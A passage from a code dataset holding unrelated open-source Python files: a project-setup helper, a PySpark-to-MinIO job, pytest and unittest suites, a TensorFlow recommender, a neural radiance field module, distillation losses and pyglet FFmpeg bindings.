Have.environ.update(os.environ)\n\n def load_pyproject_toml():\n fn = here() + '/pyproject.toml'\n if exists(fn):\n Have.pyproject.update(toml.load(fn))\n\n def load_mkdocs():\n fn = here() + '/mkdocs.yml'\n if exists(fn):\n s = read_file(fn)\n y = yaml.load(s, Loader=yaml.Loader)\n Have.mkdocs.update(y)\n\n\ndef fn_answ():\n return '/tmp/ops_proj_answers_%s.json' % today\n\n\ndef ask(k, ex=''):\n answers = Have.prev_answers\n v = answers.get(k)\n if v:\n return v\n if ex:\n if isinstance(ex, str):\n ex = [ex]\n s = '' if len(ex) == 1 else 's'\n print('Example%s: ' % s + ', '.join(ex))\n r = input('Require value for \\x1b[1;32m%s\\x1b[0m [q: quit]: ' % k)\n if r in ('', 'q'):\n app.info('bye...')\n sys.exit(1)\n answers[k] = r\n write_file(fn_answ(), s=json.dumps(answers, indent=4, sort_keys=True))\n return r\n\n\ndef get_toppest_devapp_pgk(p, version=None):\n from pip._internal.commands.show import search_packages_info\n\n while True:\n for k in search_packages_info(p):\n f = k.required_by\n if f:\n return get_toppest_devapp_pgk(f)\n return k.name, k.version\n\n\ndef set_var(V):\n cls, v = g(vars, V), None\n k = g(cls, 'pyproj_key')\n if k:\n v = get_deep(k, Have.pyproject, dflt='')\n if not v:\n k = g(cls, 'env_key')\n if k:\n v = Have.environ.get(k)\n if not v:\n v = g(cls, 'dflt', lambda: None)\n if callable(v):\n v = v()\n exampl = g(cls, 'exmpl', '')\n if not v:\n v = ask(V, ex=exampl)\n val = g(cls, 'validate')\n if val:\n while 1:\n try:\n v = val(v)\n break\n except Exception as ex:\n Have.prev_answers.pop(V, 0)\n app.error('Cannot validate', key=V, value=v, reason=str(ex))\n v = ask(V, exampl)\n app.info(V, value=v)\n vars.have[V] = v\n\n\ndef homepage(repo):\n l = repo.split('/')\n h, g, n = l[-3], l[-2], l[-1]\n if 'gitlab' in repo:\n return 'http://%s.%s/%s' % (g, h.replace('gitlab', 'pages'), n)\n elif 'github' in repo:\n return 'https://%s.github.io/%s/' % (g, n)\n app.warn('Cannot derive docu homepage - using repo', homepage=repo)\n return repo\n\n\ndef ymldict(nav):\n d = {}\n for m in nav:\n d[list(m.keys())[0]] = list(m.values())[0]\n return d\n\n\ndef is_private():\n r = vars.have['repository']\n if '//gitlab' in r and not 'gitlab.com' in r:\n return True\n\n\ndef private_pypi():\n fn = os.environ['HOME'] + '/.config/pypoetry/config.toml'\n if not exists(fn):\n return app.info('No private pypi config found', fn=fn)\n t = toml.load(fn)\n return [\n {'name': k, 'secondary': True, 'url': v['url']}\n for k, v in t.get('repositories', {}).items()\n if v['url'].endswith('simple/')\n ]\n\n\nclass files:\n written = []\n skipped = []\n\n def adapt_environ(s):\n lines = s.splitlines()\n for k, n in [['PROJECT', 'project_name'], ['pyver', 'pyver']]:\n r = []\n while lines:\n l = lines.pop()\n if l.startswith(k + '='):\n l = k + '=\"%s\"' % vars.have[n]\n r.append(l)\n lines = r\n return '\\n'.join(lines)\n\n def adapt_mkdocs_yml(s):\n y = yaml.load(s, Loader=yaml.Loader)\n h = vars.have\n y['repo_name'] = h['project_name']\n y['repo_url'] = h['repository']\n y['site_description'] = h['project_description']\n y['site_name'] = h['project_name']\n y['site_url'] = do(homepage, h['repository'])\n n = ymldict(y['nav'])['About']\n y['nav'] = [{'Overview': 'index.md'}]\n y['nav'].append({'About': n})\n return yaml.dump(y)\n\n def adapt_pyproject_toml(s):\n h = vars.have\n t = toml.loads(s)\n T = t['tool']['poetry']\n # fmt:off\n T['authors'] = [h['author']]\n T['dependencies'] = h['dependencies']\n T['description'] = h['project_description']\n T['homepage'] = do(homepage, h['repository'])\n T['license'] = h['license']\n T['name'] = h['project_name']\n T['packages'] = [{'from': 'src', 'include': h['project_name']}]\n T['repository'] = h['repository']\n if is_private():\n T['source'] = private_pypi()\n T['version'] = h['version']\n # fmt:on\n T['dependencies'].update({'python': '^' + h['pyver']})\n T['dev-dependencies'] = {'docutools': '*'}\n return toml.dumps(t)\n\n def write(fn):\n s = get_file_master(fn)\n if not '\\n' in s:\n s = get_file_master(s)\n if not '\\n' in s:\n app.die('Cannot get master file', fn=fn)\n\n f = g(files, 'adapt_' + fn.replace('.', '_').replace('/', '_'))\n if f:\n s = f(s)\n write_file(fn, s, mkdir=True)\n files.written.append(fn)\n\n def write_all():\n for fn in Files:\n if exists(here() + '/' + fn):\n app.debug('ignoring (exists already)', fn=fn)\n files.skipped.append(fn)\n continue\n do(files.write, fn, ll=20)\n app.info(\n 'Change report', json={'skipped': files.skipped, 'created': files.written}\n )\n\n\ndef dev_install():\n do(Have.load_previous_answers)\n do(Have.read_environ_files)\n do(Have.load_pyproject_toml)\n do(Have.load_mkdocs)\n for V in sorted(vars.variables):\n do(set_var, V)\n do(files.write_all)\n sys.exit(1)\n # mk_file.write\n # write_env_file(proj_vars)\n # write_mkdocs_yml\n\n # app.debug('finding base package')\n # have = get_current_dir_state_vars()\n # p = get_toppest_devapp_pgk(['devapps',])\n # app.debug('base package', name=p)\n\n # breakpoint() # FIXME BREAKPOINT\n # print('foo')\n","repo_name":"AXGKl/devapps","sub_path":"src/devapp/plugins/ops_devapp/project/devinstall/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17873852357","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom pyspark.sql import functions as F\nfrom functools import partial\nimport os\n\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\nsc = spark\nhadoop_conf = sc._jsc.hadoopConfiguration()\nhadoop_conf.set(\"fs.s3a.impl\", \"org.apache.hadoop.fs.s3a.S3AFileSystem\")\nhadoop_conf.set(\"fs.s3a.endpoint\", os.environ[\"MINIO_URL\"])\nhadoop_conf.set(\"fs.s3a.access.key\", \"minio-root-user\")\nhadoop_conf.set(\"fs.s3a.secret.key\", \"minio-root-password\")\nhadoop_conf.set(\"fs.s3a.path.style.access\", \"True\")\n\nsummoner_detail_df = spark.read.format(\"delta\").load(\n \"s3a://league-of-data-silver/summoner/detail\"\n)\nsummoner_data_df = summoner_detail_df.drop(\n \"summonerId\", \"summonerName\", \"profileIconId\"\n)\nsummoner_data_unique_df = summoner_data_df.dropDuplicates([\"puuid\", \"extracted_at\"])\nsummoner_data_unique_revision_df = summoner_data_unique_df.withColumn(\n \"revisionDate\",\n F.from_unixtime(summoner_data_unique_df.revisionDate / 1000, \"yyyy-MM-dd HH:mm:ss\"),\n)\nsummoner_data_unique_revision_df.write.mode(\"overwrite\").partitionBy(\"puuid\").format(\n \"delta\"\n).save(\"s3a://league-of-data-gold/summoner/detail/\")\n","repo_name":"anologicon/league-of-data-ingestion","sub_path":"dags/spark/gold_summoner.py","file_name":"gold_summoner.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"26357574439","text":"import pytest\nimport boto3\nfrom pytest_mock import mocker\nfrom ec2ools import aws\n\nclass Test:\n\n\n def test_get_region(self, mocker):\n \"\"\"\n \"\"\"\n co_mock = mocker.patch('ec2ools.aws.subprocess.check_output')\n co_mock.return_value = '{\"region\": \"us-compton-1\"}'\n\n assert aws.REGION is None\n assert aws.get_region() == 'us-compton-1'\n assert aws.REGION == 'us-compton-1'\n assert co_mock.call_count == 1\n\n # test caching\n assert aws.get_region() == 'us-compton-1'\n assert co_mock.call_count == 1\n\n\n def test_client(self, mocker):\n \"\"\"\n \"\"\"\n pass\n\n def test_metadata(self, mocker):\n \"\"\"\n \"\"\"\n co_mock = mocker.patch('ec2ools.aws.subprocess.check_output')\n co_mock.return_value = b'instance-id: i-testid'\n\n assert aws.metadata('instance-id') == 'i-testid'\n\n\n\n def test_metadata_exception(self, mocker):\n \"\"\"\n \"\"\"\n co_mock = mocker.patch('ec2ools.aws.subprocess.check_output')\n co_mock.return_value = '{\"region\": \"us-compton-1\"}'\n","repo_name":"ibejohn818/ec2ools","sub_path":"tests/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33469073552","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\n# set pandas to show all columns without truncation and line breaks\npd.set_option('display.max_columns', 1000)\npd.set_option('display.width', 1000)\n\n# data = np.loadtxt('data/test-data.csv', delimiter=',', dtype=int, skiprows=1,)\ndata = pd.read_csv('data/test-data.csv')\nprint(data)\n\n# reset the column.index to be numeric\nuser_index = data[data.columns[0]]\nvideo_index = data.columns\ndata = data.reset_index(drop=True)\ndata[data.columns[0]] = data.index.astype('int')\n# print(data)\n# print(data)\nscaler = 10\n\n# data = pd.DataFrame(data.to_numpy(), index=range(0,len(user_index)), columns=range(0,len(video_index)))\ndf_long = pd.melt(data, id_vars=[data.columns[0]], \n ignore_index=True, \n var_name='video_id', \n value_name='rate').dropna()\ndf_long.columns = ['user_id', 'video_id', 'rating']\ndf_long['rating'] = df_long['rating'] / scaler\n# replace the user_id to user by match user_index\ndf_long['user_id'] = df_long['user_id'].apply(lambda x: user_index[x])\n# data = df_long.to_numpy()\n\n#print(df_long)\n\ndataset = df_long\n# Encode the user and movie IDs\nuser_encoder = LabelEncoder()\nvideo_encoder = LabelEncoder()\ndataset['user_id'] = user_encoder.fit_transform(dataset['user_id'])\ndataset['video_id'] = video_encoder.fit_transform(dataset['video_id'])\n\n# Split the dataset into train and test sets\n# train, test = train_test_split(dataset, test_size=0.2, random_state=42)\ntrain = dataset\n\n# Model hyperparameters\nnum_users = len(dataset['user_id'].unique())\nnum_countries = len(dataset['video_id'].unique())\n\n\nembedding_dim = 64\n\n# Create the NCF model\ninputs_user = tf.keras.layers.Input(shape=(1,))\ninputs_video = tf.keras.layers.Input(shape=(1,))\nembedding_user = tf.keras.layers.Embedding(num_users, embedding_dim)(inputs_user)\nembedding_video = tf.keras.layers.Embedding(num_countries, embedding_dim)(inputs_video)\n\n# Merge the embeddings using concatenation, you can also try other merging methods like dot product or multiplication\nmerged = tf.keras.layers.Concatenate()([embedding_user, embedding_video])\nmerged = tf.keras.layers.Flatten()(merged)\n\n# Add fully connected layers\ndense = tf.keras.layers.Dense(64, activation='relu')(merged)\ndense = tf.keras.layers.Dense(32, activation='relu')(dense)\noutput = tf.keras.layers.Dense(1, activation='sigmoid')(dense)\n\n# Compile the model\nmodel = tf.keras.Model(inputs=[inputs_user, inputs_video], outputs=output)\nmodel.compile(optimizer='adam', loss='mse', metrics=['mae'])\n\nmodel.fit(\n [train['user_id'].values, train['video_id'].values],\n train['rating'].values,\n batch_size=64,\n epochs=100,\n verbose=0,\n # validation_split=0.1,\n)\n\nresult_df = {}\nfor user_i in range(1, 10):\n user = f'User{user_i}'\n result_df[user] = {}\n for video_i in range(1, 7): \n video = f'Video {video_i}'\n pred_user_id = user_encoder.transform([user])\n pred_video_id = video_encoder.transform([video])\n result = model.predict(x=[pred_user_id, pred_video_id], verbose=0)\n result_df[user][video] = result[0][0]\nresult_df = pd.DataFrame(result_df).T\nresult_df *= scaler\n\nprint(result_df)\n\n","repo_name":"zcxey2911/NeuralCollaborativeFiltering_NCF_Tensorflow","sub_path":"ncf_tensorflow.py","file_name":"ncf_tensorflow.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"74577229064","text":"import torch\nimport tinycudann as tcnn\nfrom .tensor_base import TensorBase\nimport numpy as np\nfrom icecream import ic\nfrom mutils import normalize\nimport torch.nn.functional as F\nfrom modules import util\n\ndef init_weights(m):\n if isinstance(m, torch.nn.Linear):\n # torch.nn.init.xavier_uniform_(m.weight, gain=np.sqrt(2))\n torch.nn.init.kaiming_uniform_(m.weight)\n torch.nn.init.constant_(m.bias, 0)\n\nclass TCNNRF(TensorBase):\n def __init__(self, aabb, encoder_conf, enc_dim, max_resolution, lr_density, init_scale, calibrate=True, roughness_bias=-1, tint_offset=0, diffuse_offset=-1, enc_mul=1, **kwargs):\n super().__init__(aabb, **kwargs)\n\n # self.nSamples = 1024 \n # self.nSamples = 512 \n self.nSamples = 1024\n diag = (aabb**2).sum().sqrt()\n self.stepSize = diag / self.nSamples\n self.calibrate = calibrate\n g = self.nSamples\n self.grid_size = torch.tensor([g, g, g])\n self.units = self.stepSize\n self.tint_offset = tint_offset\n self.diffuse_offset = diffuse_offset\n self.roughness_bias = roughness_bias\n self.enc_mul = enc_mul\n self.lr_density = lr_density\n\n self.separate_appgrid = False\n\n self.bound = torch.abs(aabb).max()\n bound = 1\n per_level_scale = np.exp2(np.log2(max_resolution * bound / encoder_conf.base_resolution) / (encoder_conf.n_levels - 1))\n ic(per_level_scale)\n\n self.encoding = tcnn.Encoding(3, encoding_config=dict(per_level_scale=per_level_scale, **encoder_conf))\n app_dim = encoder_conf.n_features_per_level * encoder_conf.n_levels\n self.n_features_per_level = encoder_conf.n_features_per_level\n self.n_levels = encoder_conf.n_levels\n # self.sigma_net = tcnn.Network(n_input_dims=self.app_dim, n_output_dims=1, network_config=dict(**network_config))\n torch.nn.init.uniform_(list(self.encoding.parameters())[0], -init_scale, init_scale)\n # torch.nn.init.constant_(list(self.encoding.parameters())[0], init_scale)\n self.sigma_net = util.create_mlp(app_dim, enc_dim, **kwargs)\n self.density_layer = util.create_mlp(enc_dim, 1, 1, initializer='kaiming')\n self.app_dim = enc_dim\n # self.sigma_net.apply(init_weights)\n\n def get_optparam_groups(self, lr_scale=1):\n grad_vars = [\n {'params': self.encoding.parameters(), 'lr': self.lr*lr_scale},\n {'params': self.sigma_net.parameters(), 'lr': self.lr_net*lr_scale},\n {'params': self.density_layer.parameters(), 'lr': self.lr_density*lr_scale},\n ]\n return grad_vars\n\n def density_L1(self):\n return torch.tensor(0.0, device=self.get_device())\n\n def check_schedule(self, iter, batch_mul):\n return False\n\n def coords2input(self, xyz_normed):\n return (xyz_normed[..., :3].reshape(-1, 3)/2+0.5).contiguous()\n\n def calc_feat(self, xyz_normed):\n feat = self.encoding(self.coords2input(xyz_normed)).type(xyz_normed.dtype)\n # device = xyz_normed.device\n # scale = 2**torch.arange(0, self.n_levels, device=device).repeat_interleave(self.n_features_per_level)\n # var = xyz_normed[:, 3]\n # feat_scale = torch.exp(-(scale**2).reshape(1, -1) * var.reshape(-1, 1))\n # feat = feat_scale * feat * self.enc_mul\n h = self.sigma_net(feat)\n # sigfeat = h[:, 0]\n # h = h[:, 1:]\n sigfeat = self.density_layer(h)\n\n # x = feat\n # for i, layer in enumerate(self.sigma_net.children()):\n # x = layer(x)\n # if hasattr(layer, 'weight') and layer.weight.grad is not None:\n # ic(i, x[0], layer.weight.shape, layer.weight.mean(dim=0), layer.weight.grad.mean(dim=0))\n return sigfeat, h\n\n def _compute_feature(self, xyz_normed):\n sigfeat, h = self.calc_feat(xyz_normed)\n return sigfeat, h\n\n def _compute_appfeature(self, xyz_normed):\n sigfeat, h = self.calc_feat(xyz_normed)\n return h\n\n def _compute_densityfeature(self, xyz_normed):\n sigfeat, h = self.calc_feat(xyz_normed)\n return sigfeat\n\n def shrink(self, new_aabb, voxel_size):\n pass\n\n","repo_name":"half-potato/nmf","sub_path":"fields/tcnn.py","file_name":"tcnn.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"81"} +{"seq_id":"21909124045","text":"import unittest\nimport itertools\nimport random\nfrom mavehgvs.position import VariantPosition\nfrom mavehgvs.exceptions import MaveHgvsParseError\n\n\nclass TestObjectCreation(unittest.TestCase):\n def test_position_only(self) -> None:\n v = VariantPosition(\"8\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (8, None, None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertFalse(v.is_extended())\n\n v = VariantPosition(\"92380\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (92380, None, None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertFalse(v.is_extended())\n\n def test_amino_acid(self) -> None:\n v = VariantPosition(\"Gly8\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (8, \"Gly\", None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertTrue(v.is_protein())\n self.assertFalse(v.is_extended())\n\n v = VariantPosition(\"Cys92380\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (92380, \"Cys\", None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertTrue(v.is_protein())\n self.assertFalse(v.is_extended())\n\n def test_invalid_strings(self) -> None:\n position_strings = (\n \"08\",\n \"+12\",\n \"*-99\",\n \"A\",\n \"TCGA\",\n \"g\",\n \"*\",\n \"-\",\n \"+\",\n \"**6\",\n \"800 + 12\",\n \"-12*5\",\n \"Glu-12\",\n \"*5Trp\",\n \"Xyz12\",\n \"ALA12\",\n )\n for s in position_strings:\n with self.subTest(s=s):\n with self.assertRaises(MaveHgvsParseError):\n VariantPosition(s)\n\n def test_utr(self) -> None:\n v = VariantPosition(\"*8\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (8, None, None, True),\n )\n self.assertTrue(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"-80\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (-80, None, None, True),\n )\n self.assertTrue(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n def test_intron(self) -> None:\n v = VariantPosition(\"122-6\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (122, None, -6, None),\n )\n self.assertFalse(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"78+10\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr), (78, None, 10, None)\n )\n self.assertFalse(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n def test_utr_intron(self) -> None:\n v = VariantPosition(\"*89+67\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr), (89, None, 67, True)\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"-127+6\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (-127, None, 6, True),\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"*73-105\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (73, None, -105, True),\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"-45-1\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (-45, None, -1, True),\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n\nclass TestObjectRepresentation(unittest.TestCase):\n def test_repr(self) -> None:\n position_strings = (\n \"8\",\n \"92380\",\n \"*8\",\n \"-80\",\n \"122-6\",\n \"78+10\",\n \"*89+67\",\n \"-127+6\",\n \"*73-105\",\n \"-45-1\",\n \"Cys234\",\n \"Ala9\",\n )\n for s in position_strings:\n with self.subTest(s=s):\n v = VariantPosition(s)\n self.assertEqual(s, repr(v))\n\n\n# TODO: add amino acid variants\nclass TestComparisons(unittest.TestCase):\n def setUp(self) -> None:\n sorted_position_strings = (\n \"-45-1\",\n \"-12\",\n \"8\",\n \"99\",\n \"99+88\",\n \"99+122\",\n \"100-12\",\n \"100\",\n \"101\",\n \"202-12\",\n \"202-1\",\n \"202\",\n \"*1\",\n \"*73-105\",\n )\n\n self.sorted_variants = [VariantPosition(p) for p in sorted_position_strings]\n\n # pairwise itertools recipe\n a, b = itertools.tee(self.sorted_variants)\n next(b, None)\n self.sorted_variant_pairs = zip(a, b)\n\n def test_eq(self) -> None:\n for v in self.sorted_variants:\n with self.subTest(v=v):\n self.assertEqual(v, v)\n\n def test_ne(self) -> None:\n for v1, v2 in self.sorted_variant_pairs:\n with self.subTest(v1=v1, v2=v2):\n self.assertNotEqual(v1, v2)\n\n def test_lt(self) -> None:\n for v1, v2 in self.sorted_variant_pairs:\n with self.subTest(v1=v1, v2=v2):\n self.assertLess(v1, v2)\n\n def test_sorting(self) -> None:\n for _ in range(10):\n with self.subTest():\n shuffled_variants = self.sorted_variants.copy()\n while shuffled_variants == self.sorted_variants:\n random.shuffle(shuffled_variants)\n self.assertListEqual(self.sorted_variants, sorted(shuffled_variants))\n\n\n# TODO: add amino acid variants\nclass TestAdjacency(unittest.TestCase):\n def test_adjacent_pairs(self) -> None:\n adjacent_pairs = (\n (\"-45-2\", \"-45-1\"),\n (\"-45-1\", \"-45\"),\n (\"-12\", \"-13\"),\n (\"-1\", \"1\"),\n (\"8\", \"9\"),\n (\"202-1\", \"202\"),\n (\"99\", \"99+1\"),\n (\"99+88\", \"99+89\"),\n (\"100-12\", \"100-11\"),\n (\"100\", \"101\"),\n (\"*1\", \"*2\"),\n (\"*73-1\", \"*73\"),\n )\n for s1, s2 in adjacent_pairs:\n v1 = VariantPosition(s1)\n v2 = VariantPosition(s2)\n with self.subTest(v1=v1, v2=v2):\n self.assertTrue(v1.is_adjacent(v2))\n with self.subTest(v1=v1, v2=v2):\n self.assertTrue(v2.is_adjacent(v1))\n\n def test_not_adjacent_to_self(self) -> None:\n position_strings = (\n \"-45-1\",\n \"-12\",\n \"8\",\n \"99\",\n \"99+88\",\n \"99+122\",\n \"100-12\",\n \"100\",\n \"103\",\n \"202-12\",\n \"202-1\",\n \"205\",\n \"*1\",\n \"*12\",\n \"*73-105\",\n )\n variants = [VariantPosition(s) for s in position_strings]\n for v in variants:\n with self.subTest(v=v):\n self.assertFalse(v.is_adjacent(v))\n\n def test_non_adjacent_pairs(self) -> None:\n position_strings = (\n \"-45-1\",\n \"-12\",\n \"8\",\n \"99\",\n \"99+88\",\n \"99+122\",\n \"100-12\",\n \"103\",\n \"202-12\",\n \"202-1\",\n \"205\",\n \"*1\",\n \"*12\",\n \"*73-105\",\n )\n variants = [VariantPosition(s) for s in position_strings]\n\n for v1, v2 in itertools.permutations(variants, 2):\n with self.subTest(v1=v1, v2=v2):\n self.assertFalse(v1.is_adjacent(v2))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"VariantEffect/mavehgvs","sub_path":"tests/test_position.py","file_name":"test_position.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"74140361865","text":"from torch import nn\nfrom torchdistill.losses.single import register_single_loss\nfrom torchdistill.losses.util import register_func2extract_org_output\n\n\n@register_func2extract_org_output\ndef extract_org_loss_dict(org_criterion, student_outputs, teacher_outputs, targets, uses_teacher_output, **kwargs):\n \"\"\"\n Extracts loss(es) from student_outputs inside `TrainingBox` or `DistillationBox` in `torchdistill`.\n\n :param org_criterion: not used\n :type org_criterion: nn.Module\n :param student_outputs: student models' output\n :type student_outputs: dict or Any\n :param teacher_outputs: not used\n :type teacher_outputs: Any\n :param targets: not used\n :type targets: Any\n :param uses_teacher_output: not used\n :type uses_teacher_output: bool\n :return: original loss dict\n :rtype: class\n \"\"\"\n org_loss_dict = dict()\n if isinstance(student_outputs, dict):\n org_loss_dict.update(student_outputs)\n return org_loss_dict\n\n\n@register_func2extract_org_output\ndef extract_org_segment_loss(org_criterion, student_outputs, teacher_outputs, targets, uses_teacher_output, **kwargs):\n \"\"\"\n Computes loss(es) using the original loss module inside `TrainingBox` or `DistillationBox` in `torchdistill`\n for semantic segmentation models in `torchvision`.\n\n :param org_criterion: original loss module\n :type org_criterion: nn.Module\n :param student_outputs: student models' output\n :type student_outputs: dict or Any\n :param teacher_outputs: not used\n :type teacher_outputs: Any\n :param targets: targets\n :type targets: Any\n :param uses_teacher_output: not used\n :type uses_teacher_output: bool\n :return: original loss dict\n :rtype: class\n \"\"\"\n org_loss_dict = dict()\n if isinstance(student_outputs, dict):\n sub_loss_dict = dict()\n for key, outputs in student_outputs.items():\n sub_loss_dict[key] = org_criterion(outputs, targets)\n\n org_loss = sub_loss_dict['out']\n if 'aux' in sub_loss_dict:\n org_loss += 0.5 * sub_loss_dict['aux']\n org_loss_dict['total'] = org_loss\n return org_loss_dict\n\n\n@register_single_loss\nclass BppLoss(nn.Module):\n \"\"\"\n Bit-per-pixel (or rate) loss.\n\n :param entropy_module_path: entropy module path to extract its output from io_dict\n :type entropy_module_path: str\n :param reduction: reduction type ('sum', 'batchmean', or 'mean')\n :type reduction: str or None\n \"\"\"\n def __init__(self, entropy_module_path, reduction='mean'):\n super().__init__()\n self.entropy_module_path = entropy_module_path\n self.reduction = reduction\n\n def forward(self, student_io_dict, *args, **kwargs):\n \"\"\"\n Computes a rate loss.\n\n :param student_io_dict: io_dict of model to be trained\n :type student_io_dict: dict\n \"\"\"\n entropy_module_dict = student_io_dict[self.entropy_module_path]\n intermediate_features, likelihoods = entropy_module_dict['output']\n n, _, h, w = intermediate_features.shape\n num_pixels = n * h * w\n if self.reduction == 'sum':\n bpp = -likelihoods.log2().sum()\n elif self.reduction == 'batchmean':\n bpp = -likelihoods.log2().sum() / n\n else:\n bpp = -likelihoods.log2().sum() / num_pixels\n return bpp\n","repo_name":"yoshitomo-matsubara/sc2-benchmark","sub_path":"sc2bench/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"81"} +{"seq_id":"18304790531","text":"from ctypes import c_int, c_uint16, c_int32, c_int64, c_uint32, c_uint64\nfrom ctypes import c_uint8, c_uint, c_double, c_float, c_ubyte, c_size_t, c_char, c_char_p\nfrom ctypes import c_void_p, addressof, byref, cast, POINTER, CFUNCTYPE, Structure, Union\nfrom ctypes import create_string_buffer, memmove\n\nimport pyglet\nimport pyglet.lib\nfrom . import libavcodec\nfrom . import libavutil\n\navformat = pyglet.lib.load_library(\n 'avformat',\n win32='avformat-58',\n darwin='avformat.58'\n)\n\nAVSEEK_FLAG_BACKWARD = 1 # ///< seek backward\nAVSEEK_FLAG_BYTE = 2 # ///< seeking based on position in bytes\nAVSEEK_FLAG_ANY = 4 # ///< seek to any frame, even non-keyframes\nAVSEEK_FLAG_FRAME = 8 # ///< seeking based on frame number\n\nMAX_REORDER_DELAY = 16\n\n\nclass AVPacketList(Structure): pass\n\n\nclass AVInputFormat(Structure):\n _fields_ = [\n ('name', c_char_p)\n ]\n\n\nclass AVOutputFormat(Structure):\n pass\n\n\nclass AVIOContext(Structure):\n pass\n\n\nclass AVIndexEntry(Structure):\n pass\n\n\nclass AVStreamInfo(Structure):\n _fields_ = [\n ('last_dts', c_int64),\n ('duration_gcd', c_int64),\n ('duration_count', c_int),\n ('rfps_duration_sum', c_int64),\n ('duration_error', POINTER(c_double * 2 * (30 * 12 + 30 + 3 + 6))),\n ('codec_info_duration', c_int64),\n ('codec_info_duration_fields', c_int64),\n ('frame_delay_evidence', c_int),\n ('found_decoder', c_int),\n ('last_duration', c_int64),\n ('fps_first_dts', c_int64),\n ('fps_first_dts_idx', c_int),\n ('fps_last_dts', c_int64),\n ('fps_last_dts_idx', c_int),\n ]\n\n\nclass AVProbeData(Structure):\n _fields_ = [\n ('filename', c_char_p),\n ('buf', POINTER(c_ubyte)),\n ('buf_size', c_int),\n ('mime_type', c_char_p)\n ]\n\n\nclass FFFrac(Structure):\n pass\n\n\nclass AVStreamInternal(Structure):\n pass\n\n\nclass AVFrac(Structure):\n _fields_ = [\n ('val', c_int64),\n ('num', c_int64),\n ('den', c_int64),\n ]\n\n\nAVCodecContext = libavcodec.AVCodecContext\nAVPacketSideData = libavcodec.AVPacketSideData\nAVPacket = libavcodec.AVPacket\nAVCodecParserContext = libavcodec.AVCodecParserContext\nAVCodecParameters = libavcodec.AVCodecParameters\nAVRational = libavutil.AVRational\nAVDictionary = libavutil.AVDictionary\nAVFrame = libavutil.AVFrame\n\n\nclass AVStream(Structure):\n _fields_ = [\n ('index', c_int),\n ('id', c_int),\n ('codec', POINTER(AVCodecContext)),\n ('priv_data', c_void_p),\n ('time_base', AVRational),\n ('start_time', c_int64),\n ('duration', c_int64),\n ('nb_frames', c_int64),\n ('disposition', c_int),\n ('discard', c_int),\n ('sample_aspect_ratio', AVRational),\n ('metadata', POINTER(AVDictionary)),\n ('avg_frame_rate', AVRational),\n ('attached_pic', AVPacket),\n ('side_data', POINTER(AVPacketSideData)),\n ('nb_side_data', c_int),\n ('event_flags', c_int),\n ('r_frame_rate', AVRational),\n ('recommended_encoder_configuration', c_char_p),\n ('codecpar', 